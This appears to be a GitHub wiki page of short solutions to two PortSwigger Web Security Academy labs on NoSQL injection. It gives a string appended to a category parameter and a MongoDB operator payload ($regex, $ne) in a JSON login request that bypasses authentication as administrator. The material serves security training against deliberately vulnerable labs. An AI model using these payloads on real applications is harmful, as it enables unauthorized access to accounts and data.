NoSQL injection - gachikuku/portswigger GitHub Wiki

Apprentice lab:
Detecting NoSQL injection

  • Solution

    1. Select a category.
    2. Append '||'1'=='1.

Apprentice lab:
Exploiting NoSQL operator injection to bypass authentication

  • Solution

    1. Log in as wiener:peter. Observe the JSON POST request.
    2. Tamper with it, to login as administrator. Get familiar with MongoDB. 
      {
    "username": {
        "$regex":"admin.*"
    },
    "password": {
        "$ne": ""
    }
}

Solutions for the Portswigger's Web Security Academy using mitmproxy and other cli tools instead of Burp Suite

⚠️ **GitHub.com Fallback** ⚠️